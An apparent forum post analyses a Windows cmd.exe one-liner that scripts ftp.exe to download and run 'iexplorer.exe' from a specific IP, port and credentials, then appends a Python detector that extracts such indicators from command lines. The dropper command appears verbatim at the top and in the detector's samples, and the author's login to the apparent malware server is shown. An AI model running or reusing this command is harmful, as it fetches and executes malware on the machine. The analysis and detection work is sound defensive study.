start %systemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
Alright, I'm going to do my best to decipher this, line by line. Each >> probably shows a line break, or new line. Small note: it looks like part of something bigger. A fragment.
start %systemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191
This starts cmd.exe, deletes the file called eq and echoes "open 181.166.154.188 7191" to something, possibly a text file named eq. An FTP server, from the looks of it.
start %so user 10515 16135
Start is a batch/DOS (command prompt) command. It's used to start a program. The %so may be a variable, and "user 10515 16135" is probably an argument. User is a command in the ftp program, mentioned later in the fragment.
eq &echo get iexplorer.exe
This might be adding 'get iexplorer.exe' to the file eq, which was created somewhere before.
eq &echo quit
This adds quit to eq.
eq &ftp -n -s:eq &iexplorer.exe &del eq
This is a bit of a red flag. It's calling FTP, which is a program. FTP = File Transfer Protocol = sending files over the internet. It's trying to launch it, like you might type into the command prompt: ftp -n -s:eq. del eq = delete eq. eq is a file. If it's not calling cd to change directories, look in system32, where cmd.exe is located, for a text file named eq.txt. The -n argument is used to suppress the auto-login upon initial connection. -s is used to specify a text file with FTP commands in it. eq must be the text file full of commands. So what it's doing is adding to the text file:
get iexplorer.exe
quit
From what I can tell, it's doing something really useless. It's getting the file iexplorer.exe and quitting the FTP program; it shouldn't even be sending anything because it never connected. "User" in ftp.exe sends new user information, from what the description it gave me said. So it must be sending a new username and password. I'll try to connect to the actual FTP server right now with those credentials.
EDIT: Upon connecting to the FTP server in FileZilla,
Status: Connecting to 181.166.154.188:7191...
Status: Connection established, waiting for welcome message...
Response: 220 StnyFtpd 0wns j0
Command: USER 10515
Response: 331 Password required
Command: PASS *****
Response: 230 User logged in.
Command: SYST
Response: 215 StnyFtpd
Command: FEAT
Error: Connection attempt interrupted by user
I disconnected before it could do anything more.
It seemed to get stuck on FEAT. FEAT returns all features of the FTP server.
"StnyFtpd 0wns j0" is probably some leetspeak stuff. User 10515 may mean that Evar's computer is the 10515th computer infected. I found this after googling "StnyFtpd 0wns j0":
http://seclists.org/fulldisclosure/2004/Sep/864
Google StnyFtpd and you'll find plenty of scary articles about it.
I'll try to connect using ftp.exe now. This stuff is really cryptic.
EDIT: Back, and I may have just infected my computer with this virus inadvertently. It said "PORT command successful" after I connected to it in ftp.exe, and then it told me that Windows Firewall blocked some features of ftp.exe. A bit scared now. I'm going to try again in a virtual machine.
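The one-liner analysed above is a common FTP dropper pattern: a chain of echo ... >> file appends builds an ftp.exe script (open host port / user name pass / get payload / quit), ftp -n -s:file replays it, and the fetched file is then executed and the script deleted. The following is an added example, not code from the original post: a small Python parser that pulls the indicators (server, port, credentials, fetched file, executed file) out of such a cmd.exe command line, as you might run over process-creation or shell-history logs. The first sample line is the one quoted in the post; the two benign lines and the FtpDropper/parse_ftp_dropper names are constructed for this example. It assumes cmd.exe chaining with & or && and ftp.exe's open/user/get vocabulary, and it deliberately refuses to flag an ftp -s: invocation whose script file was not built inline by the same chain.

```python
"""Extract IOCs from an "echo ... >> file & ftp -n -s:file & payload" dropper chain.

Added example for the post above; not the original author's code.
"""
import re
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class FtpDropper:
    script_file: str                  # file the echo chain builds (the -s: argument)
    host: str = ""
    port: int = 21                    # ftp.exe default when "open" carries no port
    user: str = ""
    password: str = ""
    fetched: list = field(default_factory=list)   # files pulled with get/recv/mget
    executed: list = field(default_factory=list)  # fetched files later run in the chain


def split_chain(cmdline: str) -> list:
    """Split a cmd.exe line on '&' / '&&' (unconditional / conditional chaining)."""
    return [p.strip() for p in re.split(r"&&?", cmdline) if p.strip()]


# "echo <ftp command> >> <file>" (also accepts a single '>' overwrite)
ECHO_APPEND = re.compile(r"echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)
# "ftp [...] -s:<file>" (ftp.exe replays the commands in <file>)
FTP_SCRIPT = re.compile(r"ftp(?:\.exe)?\b.*?-s:(\S+)", re.I)


def parse_ftp_dropper(cmdline: str) -> Optional[FtpDropper]:
    parts = split_chain(cmdline)

    # 1. Collect what each "echo ... >> file" appends, keyed by target file.
    scripts = {}
    for p in parts:
        m = ECHO_APPEND.match(p)
        if m:
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))

    # 2. Find the "ftp -s:file" step and require that the chain itself built that file.
    ftp_idx = next((i for i, p in enumerate(parts) if FTP_SCRIPT.match(p)), None)
    if ftp_idx is None:
        return None
    script_file = FTP_SCRIPT.match(parts[ftp_idx]).group(1).lower()
    if script_file not in scripts:
        return None  # -s: points at a pre-existing file: not the inline-dropper pattern

    # 3. Interpret the reconstructed ftp.exe script line by line.
    d = FtpDropper(script_file=script_file)
    for line in scripts[script_file]:
        toks = line.split()
        if not toks:
            continue
        verb = toks[0].lower()
        if verb == "open" and len(toks) >= 2:          # open <host> [port]
            d.host = toks[1]
            d.port = int(toks[2]) if len(toks) >= 3 and toks[2].isdigit() else 21
        elif verb == "user" and len(toks) >= 2:        # user <name> [password]
            d.user = toks[1]
            d.password = toks[2] if len(toks) >= 3 else ""
        elif verb in ("get", "recv", "mget"):          # downloads
            d.fetched.extend(toks[1:])

    # 4. Anything fetched that is then invoked after the ftp step is the payload.
    fetched_lc = {f.lower() for f in d.fetched}
    for p in parts[ftp_idx + 1:]:
        toks = p.split()
        if toks and toks[0].lower() in fetched_lc:
            d.executed.append(toks[0])
    return d


# Constructed sample set: the first line is the one-liner quoted in the post,
# the other two are benign command lines the detector must not flag.
SAMPLES = [
    "del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq "
    "&echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq",
    "ftp -n -s:C:\\scripts\\nightly_backup.ftp",
    "echo build ok >> build.log && dir",
]


def scan(samples=SAMPLES) -> list:
    """Return one FtpDropper (or None) per input command line."""
    return [parse_ftp_dropper(s) for s in samples]


if __name__ == "__main__":
    for line, result in zip(SAMPLES, scan()):
        print("FLAGGED" if result else "clean  ", result or line)
```

Two design points worth noting. Matching on the -s: file having been built by echo in the same chain is what separates this pattern from a legitimate scripted ftp job, so a rule that only looks for "ftp -s:" will be noisy. And the credentials and server are recovered from the script lines, not the ftp invocation itself, which is why -n (no auto-login) appears: the script supplies the login with its own user line, exactly as the post worked out.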